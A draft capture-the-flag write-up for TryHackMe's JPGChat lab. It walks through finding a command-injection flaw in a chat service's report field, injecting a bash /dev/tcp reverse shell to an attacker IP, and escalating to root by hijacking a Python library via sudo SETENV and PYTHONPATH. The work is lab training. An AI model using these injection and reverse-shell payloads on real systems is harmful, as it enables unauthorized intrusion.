JPGChat CTF Writeup [DRAFT]
This is my first CTF Writeup, in this case for the JPGChat room on TryHackMe.
Enumeration
We first add an entry to /etc/hosts:
echo "10.10.A.B jpgchat.thm >> /etc/hosts"
Nmap show only ports 22 and 3000 open.
add nmap screenshot
To interact with port 3000 we tried telnet and received the following text:
$ telnet jpgchat.thm 3000
Welcome to JPChat
the source code of this service can be found at our admin's github
MESSAGE USAGE: use [MESSAGE] to message the (currently) only channel
REPORT USAGE: use [REPORT] to report someone to the admins (with proof)
Mention the hint on tryhackme
So we use nc now to interact:
echo "[REPORT]" | nc jpgchat.thm 3000
And we have some more details:
Welcome to JPChat
the source code of this service can be found at our admin's github
MESSAGE USAGE: use [MESSAGE] to message the (currently) only channel
REPORT USAGE: use [REPORT] to report someone to the admins (with proof)
this report will be read by Mozzie-jpg
your name:
To found the repository, we went github.com and searched for users https://github.com/search?q=Mozzie-jpg&type=users
The repository is: https://github.com/Mozzie-jpg/JPChat
And looking through the code we discovered a line:
os.system("bash -c 'echo %s > /opt/jpchat/logs/report.txt'" % your_name)
User Flag
So what we need is to escape a bash command to get a reverse shell:
echo "[REPORT]\n username \n 0<&196;exec 196<>/dev/tcp/10.11.X.Y/4243; bash <&196 >&196 2>&196;" | nc jpgchat.thm 3000
Mention about the semicolon
Remember to have have nc listening on the specific port in your attack machine:
nc -lvnp 4243
Now as wes user, we found the user.txt flag.
Root flag:
sudo -l:
User wes may run the following commands on ubuntu-xenial:
(root) SETENV: NOPASSWD: /usr/bin/python3 /opt/development/test_module.py
So we can do library hijacking because we can use the SETENV to change the PYTHONPATH.
We check the python script first:
wes@ubuntu-xenial:~$ cat /opt/development/test_module.py
#!/usr/bin/env python3
from compare import *
print(compare.Str('hello', 'hello', 'hello'))
So what we need is to create a compare.py file in a custom PYTHONPATH that will spawn a reverse shell:
cd /tmp
echo "import sys,socket,os,pty;s=socket.socket();s.connect(('10.11.X.Y',int('8042')));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/sh')" > compare.py
Finally we can run this sudo command to get a root reverse shell:
sudo PYTHONPATH=/tmp/ /usr/bin/python3 /opt/development/test_module.py